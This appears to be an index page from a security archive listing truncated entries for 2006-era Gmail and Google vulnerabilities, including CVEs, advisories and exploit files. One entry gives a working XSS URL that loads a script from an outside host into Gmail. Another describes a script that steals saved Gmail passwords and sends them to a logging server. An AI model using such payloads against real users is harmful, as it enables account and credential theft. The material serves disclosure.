GMail Mobile DoS

DoS on large message recevied during composing the message...

[Full-disclosure] Gmail 1.1.0 for BlackBerry remote DoS

I have tested and confirmed this bug on a BlackBerry 8700c in a repeatable fashion. Three outcomes are common so may be race condition... 1 Entire BlackBerry OS freeze. On soft-reboot, you will see the uncaught Java exception for Gmail app 2 Gmail freezes for some time, and then OS can recover...

Google Gmail cross-site request forgery vulnerability

Overview According to public reports, Google Gmail contained a cross-site request forgery XSRF vulnerability that allowed attackers to create email filters that could forward mail and attachments to arbitrary email addresses. Description Google Gmail is a web-based mail service. Gmail provides...

gmailsteal_remote.scpt.txt

-- This script can be used to steal gmail's keychained password by injecting -- Javascripts into Safari. When executed it opens gmail's login page, reads -- saved password and sends it to a logging server by creating an hidden iframe -- into gmail's page. It can be easly modified to steal other...

gmailsteal_local.scpt.txt

-- This script can be used to steal gmail's keychained password by injecting -- Javascripts into Safari. When executed it opens gmail's login page, reads -- saved password and prompts it into an alert box. -- It can be easly modified to steal other pass. -- poplix papuasia.org --...

gcaldaemon-dos.txt

Secure Network - Security Research Advisory Vuln name: GCALDaemon Remote DoS Systems affected: GCALDaemon 1.0-beta13 all platforms Systems not affected: - Severity: Low Local/Remote: Remote Vendor URL: http://gcaldaemon.sourceforge.net/ Authors: Luca "ikki" Carettoni -...

photostand120-xss.txt

Photostand1.2.0 Multiple Cross Site Scripting Vendor site : http://www.photostand.org/ Global risk : medium XSS ----- + Permanents Message & name fields are vulnerable to xss attacks. This kind of xss are pretty dangerous,because anyone who see the page gone get his cookie stolen and sended to th...

rateme-rfi.txt

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + ;;ii,,:: + + :::: :: ;;tt;;:: + + ;;:: ..,,:: ;;ii,,:: + + ,,,, ii;;,, ii;;:: ;;ii,,:: + + ii:: tt;;,, ..tt;;,,.. ;;ii;;:: + + ii,,:: ttii,, ..ff;;;;:: ;;ii;;:: + + tt;;::..,, tt;;,, ff;;;;...

google-XSS.txt

Discovered :SwEET-DeViL XSS in gmial google Exploit : http://mail.google.com/mail/?view=pr&%20%22%3E%3Cscript%20src%3Dhttp%3A//www.xxxx.com/%3E%3C/script%3E&fs=1 Regards I thank all our friends //Hacker sUn and viP HaCkEr /...

CVE-2006-6182

The Gabriele Teotino GNotebook 0.7.0.1 gadget for Google Desktop stores Gmail passwords in plaintext in the %SYSTEMDRIVE%\temp\Gnotebook.txt log file, which allows local users to obtain passwords by reading the file...

CVE-2006-6182

The Gabriele Teotino GNotebook 0.7.0.1 gadget for Google Desktop stores Gmail passwords in plaintext in the %SYSTEMDRIVE%\temp\Gnotebook.txt log file, which allows local users to obtain passwords by reading the file...

xmplay-3.txt

/ =================================================================== 0-day XMPlay 3.3.0.4 .PLS Filename Buffer Overflow Exploit =================================================================== XMPlay 3.3.0.4 and lower experiance a stack-based buffer overflow when loading malformed M3U and PLS...

CVE-2006-5902

viksoe GMail Drive shell extension allows remote attackers to perform virtual filesystem actions via e-mail messages with certain subject lines, as demonstrated by 1 a GMAILFS: 13;a;1 message with a new filename and a file attachment, which injects a new file into the filesystem; 2 a GMAILFS:...

CVE-2006-5902

viksoe GMail Drive shell extension allows remote attackers to perform virtual filesystem actions via e-mail messages with certain subject lines, as demonstrated by 1 a GMAILFS: 13;a;1 message with a new filename and a file attachment, which injects a new file into the filesystem; 2 a GMAILFS:...

CVE-2006-5903

GSpace (Gmail File Space) by Rahul Jonna is affected. Remote attackers can perform virtual filesystem actions by sending specially crafted email subjects, enabling actions such as injecting a new file (e.g., a subject like 2174|1|1|1|gs:/ d$) and creating folders (e.g., |-135|1|1|0|gs:/ d$). The ...

CVE-2006-5902

The CVE-2006-5902 issue affects the viksoe GMail Drive shell extension. The vulnerability allows remote attackers to perform virtual filesystem actions by sending specially crafted e-mail messages with certain subject lines (e.g., GMAILFS: [13;a;1], which can inject a new file; GMAILFS: [13;a;1] ...

ArticleBeach Script 2.0 - 'index.php' Remote File Inclusion

------------------------------------------------------------------------------ ArticleBeach Script = 2.0 page Remote File Inclusion Vulnerability ------------------------------------------------------------------------------ Author : Zeni Susanto a.k.a Bithedz Date Found : October, 22th 2006...

adv45-K-159-2006.txt

ECHOADV45$2006 ----------------------------------------------------------------------------------------- ECHOADV45$2006 WEBinsta CMS 0.3.1 templatesdir Remote File Inclusion Vulnerability ----------------------------------------------------------------------------------------- Author : M.Hasran...

LBlog <= "comments.asp" SQL Injection Exploit

LBlog = "comments.asp" SQL Injection Exploit - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Credit by | Chironex Fleckeri Mail | [email protected] Googledork | Powered By LBlog - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Usage :...

TSEP <= 0.942 (colorswitch.php) Remote Inclusion Vulnerability

No description provided by source. Script: TSEP = 0.942 URL: www.tsep.info Discovered: beford xbefordx gmail com Comments: "registerglobals" must be enabled duh. document.this != http://www.milw0rm.com/exploits/2098 Vulnerable Files/Code:...